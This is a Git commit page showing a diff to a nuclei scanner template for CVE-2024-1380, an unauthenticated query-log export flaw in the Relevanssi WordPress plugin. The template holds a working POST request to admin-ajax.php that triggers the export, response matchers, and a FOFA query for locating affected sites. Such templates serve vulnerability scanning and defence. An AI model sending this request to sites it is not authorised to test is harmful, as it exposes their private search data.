daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated macthers,path,req & info

patch-4
Ritik Chaddha 2024-06-05 12:33:25 +05:30 committed by GitHub
parent 0bba442795
commit dba6004666
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 16 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
CVE-2024-1380.yaml → http/cves/2024/CVE-2024-1380.yaml
View File

@ -1,36 +1,39 @@
id: CVE-2024-1380 id: CVE-2024-1380
info: info:
name: Relevanssi - A Better Search <= 4.22.0 - Unauthenticated Query Log Export name: Relevanssi (A Better Search) <= 4.22.0 - Query Log Export
author: FLX author: FLX
severity: medium severity: medium
description: | description: |
The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.
reference: reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1380
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-1380
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3 cvss-score: 5.3
cve-id: CVE-2024-1380 cve-id: CVE-2024-1380
epss-score: 0.00043 epss-score: 0.00043
epss-percentile: 0.0866 epss-percentile: 0.0866
tags: wordpress,relevanssi,cve,vulnerability,cve2024 metadata:
verified: true
max-request: 1
fofa-query: "/wp-content/plugins/relevanssi/"
tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure
http: http:
- method: POST - raw:
path: - |
- "{{BaseURL}}/wp-admin/admin-ajax.php" POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
headers: action=&relevanssi_export=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
body: "action=&relevanssi_export=1"
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'status_code == 200' - 'status_code == 200'
- 'contains(header, "Content-Disposition: attachment;filename=relevanssi_log.csv")' - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")'
- 'contains(header, "Content-Type: application/download")' condition: and